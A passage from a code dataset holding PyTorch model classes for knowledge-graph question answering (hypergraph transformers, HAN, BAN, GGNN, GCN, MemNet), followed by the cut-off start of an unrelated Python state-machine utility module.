def forward(self, inputs):
similarity = torch.matmul(inputs, self.glove_cands.transpose(0, 1))
pred = F.log_softmax(similarity, dim=1)
return pred
class HypergraphTransformer(nn.Module):
def __init__(self, cfg, args):
super(HypergraphTransformer, self).__init__()
self.cfg = cfg
self.args = args
self.n_hop = args.n_hop
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.max_num_hqnode = cfg["MODEL"]["NUM_MAX_QNODE"]
self.n_hidden = cfg["MODEL"]["NUM_HIDDEN"]
self.max_num_hknode = cfg["MODEL"]["NUM_MAX_KNODE_{}H".format(self.n_hop)]
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.n_ans = cfg["MODEL"]["NUM_ANS"]
self.abl_only_ga = args.abl_only_ga
self.abl_only_sa = args.abl_only_sa
if "pql" in args.data_name:
self.i2e = ClassEmbedding(cfg, False) # pql : small dataset
else:
self.i2e = ClassEmbedding(cfg)
self.q2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hqnode, self.n_hidden
)
self.k2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hknode, self.n_hidden
)
if self.abl_only_sa != True:
self.trans_k_with_q = self.get_network(self_type="kq")
self.trans_q_with_k = self.get_network(self_type="qk")
if self.abl_only_ga != True:
self.trans_k_mem = self.get_network(self_type="k_mem", layers=3)
self.trans_q_mem = self.get_network(self_type="q_mem", layers=3)
self.dropout = nn.Dropout(p=self.cfg["MODEL"]["INP_DROPOUT"])
self.out_dropout = 0.0
if self.args.abl_ans_fc != True:
self.proj1 = nn.Linear(2 * self.n_hidden, self.n_hidden)
self.proj2 = nn.Linear(self.n_hidden, self.n_out)
self.ans_selector = AnswerSelector(cfg)
else:
self.proj1 = nn.Linear(2 * self.n_hidden, self.n_hidden)
self.proj2 = nn.Linear(self.n_hidden, self.n_ans)
def get_network(self, self_type="", layers=-1):
if self_type in ["kq", "k_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_K"]
elif self_type in ["qk", "q_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_Q"]
else:
raise ValueError("Unknown network type")
return TransformerEncoder(
embed_dim=embed_dim,
num_heads=self.cfg["MODEL"]["NUM_HEAD"],
layers=max(self.cfg["MODEL"]["NUM_LAYER"], layers),
attn_dropout=attn_dropout,
relu_dropout=self.cfg["MODEL"]["RELU_DROPOUT"],
res_dropout=self.cfg["MODEL"]["RES_DROPOUT"],
embed_dropout=self.cfg["MODEL"]["EMB_DROPOUT"],
attn_mask=self.cfg["MODEL"]["ATTN_MASK"],
fc_hid_coeff=self.cfg["MODEL"]["FC_HID_COEFF"],
)
def forward(self, batch):
he_ques = batch[0]
he_kg = batch[1]
num_batch = he_ques.shape[0]
num_he_ques = he_ques.shape[1]
num_he_kg = he_kg.shape[1]
he_ques = torch.reshape(self.i2e(he_ques), (num_batch, num_he_ques, -1))
he_kg = torch.reshape(self.i2e(he_kg), (num_batch, num_he_kg, -1))
he_ques = self.q2h(he_ques)
he_kg = self.k2h(he_kg)
he_ques = self.dropout(he_ques)
he_kg = self.dropout(he_kg)
he_ques = he_ques.permute(1, 0, 2)
he_kg = he_kg.permute(1, 0, 2)
if self.args.abl_only_ga == True:
h_k_with_q = self.trans_k_with_q(he_kg, he_ques, he_ques)
h_ks_sum = torch.sum(h_k_with_q, axis=0)
h_q_with_k = self.trans_q_with_k(he_ques, he_kg, he_kg)
h_qs_sum = torch.sum(h_q_with_k, axis=0)
last_kq = torch.cat([h_ks_sum, h_qs_sum], dim=1)
elif self.args.abl_only_sa == True:
h_ks = self.trans_k_mem(he_kg)
h_ks_sum = torch.sum(h_ks, axis=0)
h_qs = self.trans_q_mem(he_ques)
h_qs_sum = torch.sum(h_qs, axis=0)
last_kq = torch.cat([h_ks_sum, h_qs_sum], dim=1)
else: # self.args.abl_only_ga == False and self.args.abl_only_sa == False:
h_k_with_q = self.trans_k_with_q(he_kg, he_ques, he_ques)
h_ks = self.trans_k_mem(h_k_with_q)
h_ks_sum = torch.sum(h_ks, axis=0)
h_q_with_k = self.trans_q_with_k(he_ques, he_kg, he_kg)
h_qs = self.trans_q_mem(h_q_with_k)
h_qs_sum = torch.sum(h_qs, axis=0)
last_kq = torch.cat([h_ks_sum, h_qs_sum], dim=1)
if self.args.abl_ans_fc != True:
output = self.proj2(
F.dropout(
F.relu(self.proj1(last_kq)),
p=self.out_dropout,
training=self.training,
)
)
pred = self.ans_selector(output)
else:
output = self.proj2(
F.dropout(
F.relu(self.proj1(last_kq)),
p=self.out_dropout,
training=self.training,
)
)
pred = F.log_softmax(output, dim=1)
return pred
class HypergraphTransformer_wohe(nn.Module):
def __init__(self, cfg, args):
super(HypergraphTransformer_wohe, self).__init__()
self.cfg = cfg
self.args = args
self.n_hop = args.n_hop
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.n_hidden = cfg["MODEL"]["NUM_HIDDEN"]
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.n_ans = cfg["MODEL"]["NUM_ANS"]
self.max_num_hqnode = 1
self.max_num_hknode = 1
self.i2e = ClassEmbedding(cfg)
self.q2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hqnode, self.n_hidden
)
self.k2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hknode, self.n_hidden
)
self.trans_k_with_q = self.get_network(self_type="kq")
self.trans_q_with_k = self.get_network(self_type="qk")
self.trans_k_mem = self.get_network(self_type="k_mem", layers=3)
self.trans_q_mem = self.get_network(self_type="q_mem", layers=3)
self.proj1 = nn.Linear(2 * self.n_hidden, self.n_hidden)
self.proj2 = nn.Linear(self.n_hidden, self.n_out)
self.dropout = nn.Dropout(p=self.cfg["MODEL"]["INP_DROPOUT"])
self.out_dropout = 0.0
if self.args.abl_ans_fc != True:
self.proj1 = nn.Linear(2 * self.n_hidden, self.n_hidden)
self.proj2 = nn.Linear(self.n_hidden, self.n_out)
self.ans_selector = AnswerSelector(cfg)
else:
self.proj1 = nn.Linear(2 * self.n_hidden, self.n_hidden)
self.proj2 = nn.Linear(self.n_hidden, self.n_ans)
def get_network(self, self_type="", layers=-1):
if self_type in ["kq", "k_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_K"]
elif self_type in ["qk", "q_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_Q"]
else:
raise ValueError("Unknown network type")
return TransformerEncoder(
embed_dim=embed_dim,
num_heads=self.cfg["MODEL"]["NUM_HEAD"],
layers=max(self.cfg["MODEL"]["NUM_LAYER"], layers),
attn_dropout=attn_dropout,
relu_dropout=self.cfg["MODEL"]["RELU_DROPOUT"],
res_dropout=self.cfg["MODEL"]["RES_DROPOUT"],
embed_dropout=self.cfg["MODEL"]["EMB_DROPOUT"],
attn_mask=self.cfg["MODEL"]["ATTN_MASK"],
)
def forward(self, batch):
he_ques = batch[0]
he_kg = batch[1]
num_batch = he_ques.shape[0]
num_he_ques = he_ques.shape[1]
num_he_kg = he_kg.shape[1]
he_ques = torch.reshape(self.i2e(he_ques), (num_batch, num_he_ques, -1))
he_kg = torch.reshape(self.i2e(he_kg), (num_batch, num_he_kg, -1))
he_ques = self.q2h(he_ques)
he_kg = self.k2h(he_kg)
he_ques = self.dropout(he_ques)
he_kg = self.dropout(he_kg)
he_ques = he_ques.permute(1, 0, 2)
he_kg = he_kg.permute(1, 0, 2)
h_k_with_q = self.trans_k_with_q(he_kg, he_ques, he_ques)
h_ks = self.trans_k_mem(h_k_with_q)
h_ks_sum = torch.sum(h_ks, axis=0)
h_q_with_k = self.trans_q_with_k(he_ques, he_kg, he_kg)
h_qs = self.trans_q_mem(h_q_with_k)
h_qs_sum = torch.sum(h_qs, axis=0)
last_kq = torch.cat([h_ks_sum, h_qs_sum], dim=1)
if self.args.abl_ans_fc != True:
output = self.proj2(
F.dropout(
F.relu(self.proj1(last_kq)),
p=self.out_dropout,
training=self.training,
)
)
pred = self.ans_selector(output)
else:
output = self.proj2(
F.dropout(
F.relu(self.proj1(last_kq)),
p=self.out_dropout,
training=self.training,
)
)
pred = F.log_softmax(output, dim=1)
return pred
class HypergraphTransformer_qsetkhe(nn.Module):
def __init__(self, cfg, args):
super(HypergraphTransformer_qsetkhe, self).__init__()
self.cfg = cfg
self.args = args
self.n_hop = args.n_hop
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.n_hidden = cfg["MODEL"]["NUM_HIDDEN"]
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.max_num_hqnode = 1
self.max_num_hknode = cfg["MODEL"]["NUM_MAX_KNODE_{}H".format(self.n_hop)]
self.i2e = ClassEmbedding(cfg)
self.q2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hqnode, self.n_hidden
)
self.k2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hknode, self.n_hidden
)
self.trans_k_with_q = self.get_network(self_type="kq")
self.trans_q_with_k = self.get_network(self_type="qk")
self.trans_k_mem = self.get_network(self_type="k_mem", layers=3)
self.trans_q_mem = self.get_network(self_type="q_mem", layers=3)
self.proj1 = nn.Linear(2 * self.n_hidden, self.n_hidden)
self.proj2 = nn.Linear(self.n_hidden, self.n_out)
self.dropout = nn.Dropout(p=self.cfg["MODEL"]["INP_DROPOUT"])
self.out_dropout = 0.0
self.ans_selector = AnswerSelector(cfg)
def get_network(self, self_type="", layers=-1):
if self_type in ["kq", "k_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_K"]
elif self_type in ["qk", "q_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_Q"]
else:
raise ValueError("Unknown network type")
return TransformerEncoder(
embed_dim=embed_dim,
num_heads=self.cfg["MODEL"]["NUM_HEAD"],
layers=max(self.cfg["MODEL"]["NUM_LAYER"], layers),
attn_dropout=attn_dropout,
relu_dropout=self.cfg["MODEL"]["RELU_DROPOUT"],
res_dropout=self.cfg["MODEL"]["RES_DROPOUT"],
embed_dropout=self.cfg["MODEL"]["EMB_DROPOUT"],
attn_mask=self.cfg["MODEL"]["ATTN_MASK"],
)
def forward(self, batch):
he_ques = batch[0]
he_kg = batch[1]
num_batch = he_ques.shape[0]
num_he_ques = he_ques.shape[1]
num_he_kg = he_kg.shape[1]
he_ques = torch.reshape(self.i2e(he_ques), (num_batch, num_he_ques, -1))
he_kg = torch.reshape(self.i2e(he_kg), (num_batch, num_he_kg, -1))
he_ques = self.q2h(he_ques)
he_kg = self.k2h(he_kg)
he_ques = self.dropout(he_ques)
he_kg = self.dropout(he_kg)
he_ques = he_ques.permute(1, 0, 2)
he_kg = he_kg.permute(1, 0, 2)
h_k_with_q = self.trans_k_with_q(he_kg, he_ques, he_ques)
h_ks = self.trans_k_mem(h_k_with_q)
h_ks_sum = torch.sum(h_ks, axis=0)
h_q_with_k = self.trans_q_with_k(he_ques, he_kg, he_kg)
h_qs = self.trans_q_mem(h_q_with_k)
h_qs_sum = torch.sum(h_qs, axis=0)
last_kq = torch.cat([h_ks_sum, h_qs_sum], dim=1)
output = self.proj2(
F.dropout(
F.relu(self.proj1(last_kq)), p=self.out_dropout, training=self.training
)
)
pred = self.ans_selector(output)
return pred
class HypergraphTransformer_qhekset(nn.Module):
def __init__(self, cfg, args):
super(HypergraphTransformer_qhekset, self).__init__()
self.cfg = cfg
self.args = args
self.n_hop = args.n_hop
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.n_hidden = cfg["MODEL"]["NUM_HIDDEN"]
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.max_num_hknode = 1
self.max_num_hqnode = cfg["MODEL"]["NUM_MAX_QNODE"]
self.i2e = ClassEmbedding(cfg)
self.q2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hqnode, self.n_hidden
)
self.k2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hknode, self.n_hidden
)
self.trans_k_with_q = self.get_network(self_type="kq")
self.trans_q_with_k = self.get_network(self_type="qk")
self.trans_k_mem = self.get_network(self_type="k_mem", layers=3)
self.trans_q_mem = self.get_network(self_type="q_mem", layers=3)
self.proj1 = nn.Linear(2 * self.n_hidden, self.n_hidden)
self.proj2 = nn.Linear(self.n_hidden, self.n_out)
self.dropout = nn.Dropout(p=self.cfg["MODEL"]["INP_DROPOUT"])
self.out_dropout = 0.0
self.ans_selector = AnswerSelector(cfg)
def get_network(self, self_type="", layers=-1):
if self_type in ["kq", "k_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_K"]
elif self_type in ["qk", "q_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_Q"]
else:
raise ValueError("Unknown network type")
return TransformerEncoder(
embed_dim=embed_dim,
num_heads=self.cfg["MODEL"]["NUM_HEAD"],
layers=max(self.cfg["MODEL"]["NUM_LAYER"], layers),
attn_dropout=attn_dropout,
relu_dropout=self.cfg["MODEL"]["RELU_DROPOUT"],
res_dropout=self.cfg["MODEL"]["RES_DROPOUT"],
embed_dropout=self.cfg["MODEL"]["EMB_DROPOUT"],
attn_mask=self.cfg["MODEL"]["ATTN_MASK"],
)
def forward(self, batch):
he_ques = batch[0]
he_kg = batch[1]
num_batch = he_ques.shape[0]
num_he_ques = he_ques.shape[1]
num_he_kg = he_kg.shape[1]
he_ques = torch.reshape(self.i2e(he_ques), (num_batch, num_he_ques, -1))
he_kg = torch.reshape(self.i2e(he_kg), (num_batch, num_he_kg, -1))
he_ques = self.q2h(he_ques)
he_kg = self.k2h(he_kg)
he_ques = self.dropout(he_ques)
he_kg = self.dropout(he_kg)
he_ques = he_ques.permute(1, 0, 2)
he_kg = he_kg.permute(1, 0, 2)
h_k_with_q = self.trans_k_with_q(he_kg, he_ques, he_ques)
h_ks = self.trans_k_mem(h_k_with_q)
h_ks_sum = torch.sum(h_ks, axis=0)
h_q_with_k = self.trans_q_with_k(he_ques, he_kg, he_kg)
h_qs = self.trans_q_mem(h_q_with_k)
h_qs_sum = torch.sum(h_qs, axis=0)
last_kq = torch.cat([h_ks_sum, h_qs_sum], dim=1)
output = self.proj2(
F.dropout(
F.relu(self.proj1(last_kq)), p=self.out_dropout, training=self.training
)
)
pred = self.ans_selector(output)
return pred
class HAN(nn.Module):
def __init__(self, cfg, args):
super(HAN, self).__init__()
self.cfg = cfg
self.n_hidden = cfg["MODEL"]["NUM_HIDDEN"]
self.n_head = cfg["MODEL"]["NUM_HEAD"]
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.n_hop = args.n_hop
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.max_num_hk = cfg["MODEL"]["NUM_MAX_HK_{}H".format(self.n_hop)]
self.max_num_hknode = cfg["MODEL"]["NUM_MAX_KNODE_{}H".format(self.n_hop)]
self.max_num_hqnode = cfg["MODEL"]["NUM_MAX_QNODE"]
self.i2e = ClassEmbedding(cfg)
self.q2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hqnode, self.n_hidden
)
self.k2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hknode, self.n_hidden
)
self.h2att = torch.nn.Linear(self.n_hidden, self.n_head)
self.softmax_att = torch.nn.Softmax(dim=2)
self.fc_out = torch.nn.Linear(self.n_hidden * self.n_head, self.n_out)
self.dropout = nn.Dropout(p=self.cfg["MODEL"]["INP_DROPOUT"])
self.ans_selector = AnswerSelector(cfg)
def multihead_att(self, he_ques, he_src):
num_batch = he_ques.shape[0]
num_he_ques = he_ques.shape[1]
num_he_src = he_src.shape[1]
he_ques = torch.reshape(self.i2e(he_ques), (num_batch, num_he_ques, -1))
he_src = torch.reshape(self.i2e(he_src), (num_batch, num_he_src, -1))
he_ques = self.q2h(he_ques)
he_src = self.k2h(he_src)
he_ques = self.dropout(he_ques)
he_src = self.dropout(he_src)
he_ques = he_ques.permute(0, 2, 1)
he_src = he_src.permute(0, 2, 1)
he_ques_selfatt = he_ques.unsqueeze(3)
he_src_selfatt = he_src.unsqueeze(2)
self_mul = torch.matmul(he_ques_selfatt, he_src_selfatt)
self_mul = self_mul.permute(0, 2, 3, 1)
att_map = self.h2att(self_mul)
att_map = att_map.permute(0, 3, 1, 2)
att_map = torch.reshape(att_map, (-1, self.n_head, num_he_ques * num_he_src))
att_map = self.softmax_att(att_map)
att_map = torch.reshape(att_map, (-1, self.n_head, num_he_ques, num_he_src))
he_ques = he_ques.unsqueeze(2)
he_src = he_src.unsqueeze(3)
for i in range(self.n_head):
att_g = att_map[:, i : i + 1, :, :]
att_g_t = att_g.repeat([1, self.n_hidden, 1, 1])
att_out = torch.matmul(he_ques, att_g_t)
att_out = torch.matmul(att_out, he_src)
att_out = att_out.squeeze(-1)
att_out_sq = att_out.squeeze(-1)
if i == 0:
output = att_out_sq
else:
output = torch.cat((output, att_out_sq), dim=1)
output = self.fc_out(output)
pred = self.ans_selector(output)
return pred, att_map
def forward(self, batch):
he_ques = batch[0]
he_kg = batch[1]
pred, att_map = self.multihead_att(he_ques, he_kg)
return pred
class BAN(nn.Module):
def __init__(self, cfg, args):
super(BAN, self).__init__()
self.cfg = cfg
self.n_hidden = cfg["MODEL"]["NUM_HIDDEN"]
self.n_head = cfg["MODEL"]["NUM_HEAD"]
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.n_hop = args.n_hop
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.max_num_hk = cfg["MODEL"]["NUM_MAX_HK_{}H".format(self.n_hop)]
self.max_num_hknode = 1
self.max_num_hqnode = 1
self.i2e = ClassEmbedding(cfg)
self.q2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hqnode, self.n_hidden
)
self.k2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hknode, self.n_hidden
)
self.h2att = torch.nn.Linear(self.n_hidden, self.n_head)
self.softmax_att = torch.nn.Softmax(dim=2)
self.fc_out = torch.nn.Linear(self.n_hidden * self.n_head, self.n_out)
self.dropout = nn.Dropout(p=self.cfg["MODEL"]["INP_DROPOUT"])
self.ans_selector = AnswerSelector(cfg)
def multihead_att(self, he_ques, he_src, q2h, s2h):
num_batch = he_ques.shape[0]
num_he_ques = he_ques.shape[1]
num_he_src = he_src.shape[1]
he_ques = torch.reshape(self.i2e(he_ques), (num_batch, num_he_ques, -1))
he_src = torch.reshape(self.i2e(he_src), (num_batch, num_he_src, -1))
he_ques = q2h(he_ques)
he_src = s2h(he_src)
he_ques = self.dropout(he_ques)
he_src = self.dropout(he_src)
he_ques = he_ques.permute(0, 2, 1)
he_src = he_src.permute(0, 2, 1)
he_ques_selfatt = he_ques.unsqueeze(3)
he_src_selfatt = he_src.unsqueeze(2)
self_mul = torch.matmul(he_ques_selfatt, he_src_selfatt)
self_mul = self_mul.permute(0, 2, 3, 1)
att_map = self.h2att(self_mul)
att_map = att_map.permute(0, 3, 1, 2)
att_map = torch.reshape(att_map, (-1, self.n_head, num_he_ques * num_he_src))
att_map = self.softmax_att(att_map)
att_map = torch.reshape(att_map, (-1, self.n_head, num_he_ques, num_he_src))
he_ques = he_ques.unsqueeze(2)
he_src = he_src.unsqueeze(3)
for i in range(self.n_head):
att_g = att_map[:, i : i + 1, :, :]
att_g_t = att_g.repeat([1, self.n_hidden, 1, 1])
att_out = torch.matmul(he_ques, att_g_t)
att_out = torch.matmul(att_out, he_src)
att_out = att_out.squeeze(-1)
att_out_sq = att_out.squeeze(-1)
if i == 0:
output = att_out_sq
else:
output = torch.cat((output, att_out_sq), dim=1)
output = self.fc_out(output)
pred = self.ans_selector(output)
return pred, att_map
def forward(self, batch):
he_ques = batch[0]
he_kg = batch[1]
pred, att_map = self.multihead_att(he_ques, he_kg, self.q2h, self.k2h)
return pred
class GGNN(nn.Module):
"""
Reimplementation of Gated Graph Sequence Neural Networks (GGNN) by <NAME>
Implementation based on https://arxiv.org/abs/1511.05493
"""
def __init__(self, cfg, args, n_node):
super(GGNN, self).__init__()
self.n_input = cfg["MODEL"]["NUM_WORD_EMB"]
self.annotation_dim = cfg["MODEL"]["NUM_ANNO"]
self.hidden_dim = cfg["MODEL"]["NUM_HIDDEN"]
self.n_edge = cfg["MODEL"]["NUM_EDGE"]
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.n_steps = cfg["MODEL"]["NUM_STEP"]
self.max_num_kg = n_node
self.max_num_q = cfg["MODEL"]["NUM_MAX_Q"]
self.i2e = ClassEmbedding(cfg)
self.fc_qenc = nn.Linear(self.n_input + self.annotation_dim, self.hidden_dim)
self.fc_kenc = nn.Linear(self.n_input + self.annotation_dim, self.hidden_dim)
self.fc_in = nn.Linear(self.hidden_dim, self.hidden_dim * self.n_edge)
self.fc_out = nn.Linear(self.hidden_dim, self.hidden_dim * self.n_edge)
self.gated_update_kg = GatedPropagation(
self.hidden_dim, self.max_num_kg, self.n_edge
)
self.graph_aggregate_kg = GraphFeature(
self.hidden_dim, self.max_num_kg, self.n_edge, self.annotation_dim
)
self.gated_update_ques = GatedPropagation(
self.hidden_dim, self.max_num_q, self.n_edge
)
self.graph_aggregate_ques = GraphFeature(
self.hidden_dim, self.max_num_q, self.n_edge, self.annotation_dim
)
self.fc_output = nn.Linear(self.hidden_dim * 2, self.n_out)
self.ans_selector = AnswerSelector(cfg)
def forward(self, batch):
"""
batch: adj_matrix, annotation, entity_rep, answer
init state x: [batch_size, num_node, hidden_size]
annoatation a: [batch_size, num_node, 1]
adj matrix m: [batch_size, num_node, num_node * n_edge_types * 2]
output out: [batch_size, n_label]
"""
ques = batch[0]
adjmat_ques = batch[1]
ques_anno = batch[2]
kg = batch[3]
adjmat_kg = batch[4]
kg_anno = batch[5]
kg = self.i2e(kg)
ques = self.i2e(ques)
kg = torch.cat((kg, kg_anno), 2)
ques = torch.cat((ques, ques_anno), 2)
kg = self.fc_kenc(kg)
ques = self.fc_qenc(ques)
for i in range(self.n_steps):
in_states = self.fc_in(kg)
out_states = self.fc_out(kg)
in_states = (
in_states.view(-1, self.max_num_kg, self.hidden_dim, self.n_edge)
.transpose(2, 3)
.transpose(1, 2)
.contiguous()
)
in_states = in_states.view(
-1, self.max_num_kg * self.n_edge, self.hidden_dim
)
out_states = (
out_states.view(-1, self.max_num_kg, self.hidden_dim, self.n_edge)
.transpose(2, 3)
.transpose(1, 2)
.contiguous()
)
out_states = out_states.view(
-1, self.max_num_kg * self.n_edge, self.hidden_dim
)
kg = self.gated_update_kg(in_states, out_states, kg, adjmat_kg)
for i in range(self.n_steps):
in_states = self.fc_in(ques)
out_states = self.fc_out(ques)
in_states = (
in_states.view(-1, self.max_num_q, self.hidden_dim, self.n_edge)
.transpose(2, 3)
.transpose(1, 2)
.contiguous()
)
in_states = in_states.view(
-1, self.max_num_q * self.n_edge, self.hidden_dim
)
out_states = (
out_states.view(-1, self.max_num_q, self.hidden_dim, self.n_edge)
.transpose(2, 3)
.transpose(1, 2)
.contiguous()
)
out_states = out_states.view(
-1, self.max_num_q * self.n_edge, self.hidden_dim
)
ques = self.gated_update_ques(in_states, out_states, ques, adjmat_ques)
kg_out = self.graph_aggregate_kg(torch.cat((kg, kg_anno), 2))
ques_out = self.graph_aggregate_ques(torch.cat((ques, ques_anno), 2))
output = torch.cat((kg_out, ques_out), axis=1)
output = self.fc_output(output)
pred = self.ans_selector(output)
return pred
class GraphFeature(nn.Module):
def __init__(self, hidden_dim, n_node, n_edge, n_anno):
super(GraphFeature, self).__init__()
self.hidden_dim = hidden_dim
self.n_node = n_node
self.n_edge = n_edge
self.n_anno = n_anno
self.fc_i = nn.Linear(self.hidden_dim + self.n_anno, self.hidden_dim)
self.fc_j = nn.Linear(self.hidden_dim + self.n_anno, self.hidden_dim)
self.sigmoid = nn.Sigmoid()
self.tanh = nn.Tanh()
def forward(self, x):
x_sigm = self.sigmoid(self.fc_i(x))
x_tanh = self.tanh(self.fc_j(x))
x_new = (x_sigm * x_tanh).sum(1)
return self.tanh(x_new)
class GatedPropagation(nn.Module):
def __init__(self, hidden_dim, n_node, n_edge):
super(GatedPropagation, self).__init__()
self.hidden_dim = hidden_dim
self.n_node = n_node
self.n_edge = n_edge
self.gate_r = nn.Linear(self.hidden_dim * 3, self.hidden_dim)
self.gate_z = nn.Linear(self.hidden_dim * 3, self.hidden_dim)
self.trans = nn.Linear(self.hidden_dim * 3, self.hidden_dim)
self.sigmoid = nn.Sigmoid()
self.tanh = nn.Tanh()
def forward(self, x_in, x_out, x_curt, matrix):
matrix_in = matrix[:, :, : self.n_node * self.n_edge]
matrix_out = matrix[:, :, self.n_node * self.n_edge :]
a_in = torch.bmm(matrix_in.float(), x_in)
a_out = torch.bmm(matrix_out.float(), x_out)
a = torch.cat((a_in, a_out, x_curt), 2)
z = self.sigmoid(self.gate_z(a))
r = self.sigmoid(self.gate_r(a))
joint_input = torch.cat((a_in, a_out, r * x_curt), 2)
h_hat = self.tanh(self.trans(joint_input))
output = (1 - z) * x_curt + z * h_hat
return output
class GCN(torch.nn.Module):
def __init__(self, cfg, arg):
super(GCN, self).__init__()
self.n_input = cfg["MODEL"]["NUM_WORD_EMB"]
self.hidden_dim = cfg["MODEL"]["NUM_HIDDEN"]
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.i2e = ClassEmbedding(cfg)
self.q_gcn1 = DenseGCNConv(self.n_input, self.hidden_dim)
self.q_gcn2 = DenseGCNConv(self.hidden_dim, self.hidden_dim)
self.kg_gcn1 = DenseGCNConv(self.n_input, self.hidden_dim)
self.kg_gcn2 = DenseGCNConv(self.hidden_dim, self.hidden_dim)
self.fc_output = nn.Linear(self.hidden_dim * 2, self.n_out)
self.ans_selector = AnswerSelector(cfg)
def forward(self, batch):
ques_idxs = batch[0]
ques_adj = batch[1]
kg_idxs = batch[2]
kg_adj = batch[3]
ques_emb = self.i2e(ques_idxs)
kg_emb = self.i2e(kg_idxs)
ques_emb = self.q_gcn1(ques_emb, ques_adj)
ques_emb = self.q_gcn2(ques_emb, ques_adj)
ques_emb = torch.sum(ques_emb, axis=1)
kg_emb = self.q_gcn1(kg_emb, kg_adj)
kg_emb = self.q_gcn2(kg_emb, kg_adj)
kg_emb = torch.sum(kg_emb, axis=1)
last_kg = torch.cat([kg_emb, ques_emb], dim=1)
output = self.fc_output(last_kg)
pred = self.ans_selector(output)
return pred
class DenseGCNConv(torch.nn.Module):
def __init__(self, in_channels, out_channels, improved=False, bias=True):
super(DenseGCNConv, self).__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.improved = improved
self.weight = nn.Parameter(torch.Tensor(self.in_channels, self.out_channels))
self.register_parameter("gcn_weight", self.weight)
if bias:
self.bias = nn.Parameter(torch.Tensor(self.out_channels))
self.register_parameter("gcn_bias", self.bias)
self.reset_parameters()
def reset_parameters(self):
utils.glorot(self.weight)
utils.zeros(self.bias)
def forward(self, x, adj, mask=None, add_loop=True):
x = x.float()
adj = adj.float()
x = x.unsqueeze(0) if x.dim() == 2 else x
adj = adj.unsqueeze(0) if adj.dim() == 2 else adj
B, N, _ = adj.size()
if add_loop:
adj = adj.clone()
idx = torch.arange(N, dtype=torch.long, device=adj.device)
adj[:, idx, idx] = 1 if not self.improved else 2
out = torch.matmul(x, self.weight)
deg_inv_sqrt = adj.sum(dim=-1).clamp(min=1).pow(-0.5)
adj = deg_inv_sqrt.unsqueeze(-1) * adj * deg_inv_sqrt.unsqueeze(-2)
out = torch.matmul(adj, out)
if self.bias is not None:
out = out + self.bias
if mask is not None:
out = out * mask.view(B, N, 1).to(x.dtype)
return out
class MemNet(nn.Module):
def __init__(self, cfg, args):
super(MemNet, self).__init__()
self.cfg = cfg
self.args = args
self.n_steps = cfg["MODEL"]["NUM_STEP"]
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.dropout = nn.Dropout(p=self.cfg["MODEL"]["DROPOUT"])
self.i2e_ab = ClassEmbedding(cfg)
if cfg["MODEL"]["SHARE_FLAG"] == True:
self.i2e_c = self.i2e_ab
else:
self.i2e_c = ClassEmbedding(cfg)
self.ans_selector = AnswerSelector(cfg)
def forward(self, batch):
q = batch[0]
x = batch[1]
bs = x.size(0)
story_len = x.size(1)
s_sent_len = x.size(2)
x = x.view(bs * story_len, -1)
u = self.dropout(self.i2e_ab(q))
u = torch.sum(torch.sum(u, 1), 1)
for k in range(self.n_steps):
m = self.dropout(self.i2e_ab(x))
m = m.view(bs, story_len, s_sent_len, -1)
m = torch.sum(m, 2)
c = self.dropout(self.i2e_c(x))
c = c.view(bs, story_len, s_sent_len, -1)
c = torch.sum(c, 2)
p = torch.bmm(m, u.unsqueeze(2))
p = torch.bmm(m, u.unsqueeze(2)).squeeze(2)
p = F.softmax(p, -1).unsqueeze(1)
o = torch.bmm(p, c).squeeze(1)
u = o + u
pred = self.ans_selector(u)
return pred
| StarcoderdataPython |
181397 | """Extra utilities for state machines, to make them more usable."""
from weakref import WeakKeyDictionary
class ProxyString(str):
"""String that proxies every call to nested machine."""
def __new__(cls, value, machine):
"""Create new string instance with reference to given machine."""
string = super(cls, cls).__new__(cls, value)
string.state_machine = machine
return string
def __getattr__(self, name):
"""Proxy call to machine."""
return getattr(self.state_machine, name)
class PropertyMachine(object):
"""Descriptor to help using machines as properties."""
def __init__(self, machine_type):
"""Create descriptor."""
self.memory = WeakKeyDictionary()
self.machine_type = machine_type
def __set__(self, instance, value):
"""Set state to machine."""
self.check_memory(instance)
self.memory[instance].set_(value)
def __get__(self, instance, _type=None):
"""Get machine state."""
if instance is None:
return self
self.check_memory(instance)
machine = self.memory[instance]
return ProxyString(machine.actual_state.value, machine)
def check_memory(self, instance):
try:
self.memory[instance]
